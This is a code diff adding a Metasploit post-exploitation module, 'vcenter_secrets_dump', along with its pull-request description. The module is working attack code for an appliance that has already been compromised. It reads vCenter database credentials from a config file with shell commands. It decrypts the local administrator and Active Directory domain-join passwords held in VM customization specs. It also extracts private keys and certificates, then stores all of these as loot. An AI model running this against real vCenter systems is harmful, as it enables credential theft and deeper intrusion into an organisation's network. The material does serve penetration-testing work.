-    p = store_loot('ssl', 'PEM', rhosts, vcenter_machine_cert.to_pem.to_s, 'MACHINE_SSL.pem', 'vCenter MACHINE_SSL certificate')
-    print_good("MACHINE_SSL_CERT: #{p}")
+    case entry_type.downcase
+    when 'getkey'
+      vprint_status("Extract #{store_label} key ...")
+      key_b64 = cmd_exec("/usr/lib/vmware-vmafd/bin/vecs-cli entry getkey --store #{store_name} --alias #{entry_alias}")
+      unless (key = OpenSSL::PKey::RSA.new(key_b64))
+        fail_with(Msf::Exploit::Failure::Unknown, "Could not extract #{store_label} private key")
+      end
+      p = store_loot(loot_alias, 'PEM', rhost, key.to_pem.to_s, "#{store_label}.key", "vCenter #{store_label} Private Key")
+      print_good("#{store_label} key: #{p}")
+      return key
+    when 'getcert'
+      vprint_status("Extract #{store_label} cert ...")
+      cert_b64 = cmd_exec("/usr/lib/vmware-vmafd/bin/vecs-cli entry getcert --store #{store_name} --alias #{entry_alias}")
+      unless (cert = OpenSSL::X509::Certificate.new(cert_b64))
+        fail_with(Msf::Exploit::Failure::Unknown, "Could not extract #{store_label} certificate")
+      end
+      p = store_loot(loot_alias, 'PEM', rhost, cert.to_pem.to_s, "#{store_label}.pem", "vCenter #{store_label} Certificate")
+      print_good("#{store_label} cert: #{p}")
+      return cert
+    else
+      fail_with(Msf::Exploit::Failure::BadConfig, "Invalid vecs-cli directive: #{entry_type.downcase}")
+    end
+  end
 
-    vprint_good("MACHINE_SSL:\n#{machine_pem}")
+  def enum_vm_cust_spec
+    shell_cmd = "export PGPASSWORD='#{@vcdb_pass}'; psql -h 'localhost' -U '#{@vcdb_user}' -d '#{@vcdb_name}' -c 'SELECT body FROM vpx_customization_spec WHERE name IN (SELECT name FROM vpx_customization_spec);' -P pager -A -t"
+    xml = cmd_exec(shell_cmd).to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
 
-    vmca_pem = "#{vmca_key.to_pem}#{vmca_cert.to_pem}"
+    xmldoc = Nokogiri::XML(xml) do |config|
+      config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+    end
 
-    p = store_loot('vmca', 'PEM', rhosts, vmca_key.to_pem.to_s, 'VMCA_ROOT.key', 'vCenter VMCA private key')
-    print_good("VMCA_ROOT_KEY: #{p}")
+    unless xmldoc
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not parse XML document from PSQL query output')
+    end
 
-    p = store_loot('vmca', 'PEM', rhosts, vmca_cert.to_pem.to_s, 'VMCA_ROOT.pem', 'vCenter VMCA certificate')
-    print_good("VMCA_ROOT_CERT: #{p}")
+    # Check for static local machine password
+    if (sysprep_element_unattend = xmldoc.at_xpath('/ConfigRoot/identity/guiUnattended'))
+      secret_is_plaintext = sysprep_element_unattend.xpath('//guiUnattended/password/plainText').text
+      case secret_is_plaintext.downcase
+      when 'true'
+        secret_plaintext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text
+      when 'false'
+        secret_ciphertext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text
+        ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse
+        secret_plaintext = @vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete("\000")
+      else
+        fail_with(Msf::Exploit::Failure::BadConfig, 'Malformed customization specification XML recieved from vCenter')
+      end
+      print_status('Initial administrator account password found')
+      print_good("Built-in administrator PW: #{secret_plaintext}")
 
-    vprint_good("VMCA_ROOT:\n#{vmca_pem}")
+      extra_service_data = {
+        address: Rex::Socket.getaddress(rhost),
+        port: 445,
+        protocol: 'tcp',
+        service_name: 'Windows',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: '.'
+      }
 
-    p = store_loot('idp', 'PEM', rhosts, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
-    print_good("SSO_STS_IDP_KEY: #{p}")
+      store_valid_credential(user: '(local built-in administrator)', private: secret_plaintext, service_data: extra_service_data)
+    end
 
-    p = store_loot('idp', 'PEM', rhosts, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
-    print_good("SSO_STS_IDP_CERT: #{p}")
+    # Check for account used for domain join
+    if (domain_element_unattend = xmldoc.at_xpath('//identification'))
+      domain_user = domain_element_unattend.xpath('//identification/domainAdmin').text
+      domain_base = domain_element_unattend.xpath('//identification/joinDomain').text
 
-    vprint_good("SSO_STS_IDP:\n#{sts_pem}")
+      secret_is_plaintext = domain_element_unattend.xpath('//identification/domainAdminPassword/plainText').text
+      case secret_is_plaintext.downcase
+      when 'true'
+        secret_plaintext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text
+      when 'false'
+        secret_ciphertext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text
+        ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse
+        secret_plaintext = @vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete("\000")
+      else
+        fail_with(Msf::Exploit::Failure::BadConfig, 'Malformed customization specification XML recieved from vCenter')
+      end
 
-    return true
+      print_status('AD domain join account found')
+      print_good("AD User: #{domain_user}@#{domain_base}")
+      print_good("AD Pass: #{secret_plaintext}")
+
+      extra_service_data = {
+        address: Rex::Socket.getaddress(rhost),
+        port: 445,
+        protocol: 'tcp',
+        service_name: 'Windows',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: domain_base
+      }
+
+      store_valid_credential(user: domain_user, private: secret_plaintext, service_data: extra_service_data)
+    end
+  end
+
+  def get_db_creds
+    shell_cmd = "cat /etc/vmware-vpx/vcdb.properties | grep jdbc:postgresql:// | awk -F '/' '{print $4}' | awk -F '?' '{print $1}'"
+    @vcdb_name = cmd_exec(shell_cmd)
+    print_good("VCDB Name: #{@vcdb_name}")
+
+    shell_cmd = "cat /etc/vmware-vpx/vcdb.properties | grep username | awk -F '=' '{print $2}'| tr -d ' '"
+    @vcdb_user = cmd_exec(shell_cmd)
+    print_good("VCDB User: #{@vcdb_user}")
+
+    shell_cmd = "cat /etc/vmware-vpx/vcdb.properties | grep password | grep -v encrypted | awk -F '=' '{print $2}'| tr -d ' '"
+    @vcdb_pass = cmd_exec(shell_cmd)
+    print_good("VCDB PW: #{@vcdb_pass}")
+
+    extra_service_data = {
+      address: Rex::Socket.getaddress(rhost),
+      port: 5432,
+      service_name: 'psql',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      realm_value: @vcdb_name
+    }
+
+    store_valid_credential(user: @vcdb_user, private: @vcdb_pass, service_data: extra_service_data)
   end
 
   def validate_uuid(uuid)
     uuid_regex = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
     return true if uuid_regex.match?(uuid.to_s.downcase)
 
-    return false
+    false
   end
 
   def validate_ipv4(ipv4)
@@ -353,80 +402,65 @@ class MetasploitModule < Msf::Post
       return false
     end
 
-    return true
+    true
   end
 
   def validate_fqdn(fqdn)
-    fqdn_regex = /(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{0,62}[a-zA-Z0-9]\.)+[a-zA-Z]{2,63}$)/
+    fqdn_regex = /(?=^.{4,253}$)(^((?!-)[a-z0-9-]{0,62}[a-z0-9]\.)+[a-z]{2,63}$)/
     return true if fqdn_regex.match?(fqdn.to_s.downcase)
 
-    return false
+    false
   end
 
   def validate_dn(dn)
     dn_regex = /^(?:(?<cn>cn=(?<name>[^,]*)),)?(?:(?<path>(?:(?:cn|ou)=[^,]+,?)+),)?(?<domain>(?:dc=[^,]+,?)+)$/
     return true if dn_regex.match?(dn.to_s.downcase)
 
-    return false
+    false
   end
 
   def validate_sts_cert(test_cert)
     unless (cert = OpenSSL::X509::Certificate.new(test_cert))
-      print_error('Invalid x509 certificate received!')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'Invalid x509 certificate received')
     end
 
     vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...')
 
-    idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT")
+    idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{@base_fqdn}/certificates?scope=TENANT")
 
-    unless (idm_json = JSON.parse(idm_cmd).first)
+    if (idm_json = JSON.parse(idm_cmd).first)
+      idm_json['certificates'].each do |idm|
+        unless (cert_verify = OpenSSL::X509::Certificate.new(idm['encoded']))
+          print_error('Invalid x509 certificate extracted from IDM!')
+          return false
+        end
+        unless cert == cert_verify
+          next
+        end
+
+        return true
+      end
+    else
       print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')
       return false
     end
 
-    idm_json['certificates'].each do |idm|
-      unless (cert_verify = OpenSSL::X509::Certificate.new(idm['encoded']))
-        print_error('Invalid x509 certificate extracted from IDM!')
-        return false
-      end
-
-      unless cert == cert_verify
-        next
-      end
-
-      return true
-    end
-
-    vprint_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
-
-    return false
+    print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
+    false
   end
 
-  def save_vmdir_credential
-    service_data = {
-      address: Rex::Socket.getaddress(rhosts),
-      port: rport,
-      service_name: (ssl ? 'ldaps' : 'ldap'),
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
+  def validate_target
+    unless command_exists?('/usr/lib/vmware-vmafd/bin/vmafd-cli')
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find vmafd-cli (is this host a vCenter appliance?)')
+    end
 
-    credential_data = {
-      module_fullname: fullname,
-      origin_type: :service,
-      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
-      realm_value: base_fqdn,
-      username: bind_dn,
-      private_type: :password,
-      private_data: bind_pw
-    }.merge(service_data)
+    unless command_exists?('/usr/lib/vmware-vmafd/bin/vecs-cli')
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find vecs-cli (is this host a vCenter appliance?)')
+    end
 
-    login_data = {
-      core: create_credential(credential_data)
-    }.merge(service_data)
-
-    create_credential_login(login_data)
+    unless command_exists?('/opt/likewise/bin/lwregshell')
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find lwregshell (is this host a vCenter appliance?)')
+    end
   end
 
 end


### PR DESCRIPTION
Add vcenter_secrets_dump post module

Add post/linux/gather module to dump vCenter vmdir dcAccountPassword
and platform certificates. It is intended to be run after successfully
acquiring root access on a vCenter appliance and is useful for
penetrating further into the environment following a vCenter exploit
that results in a root shell. This is my first PR in the history of ever - be
gentle.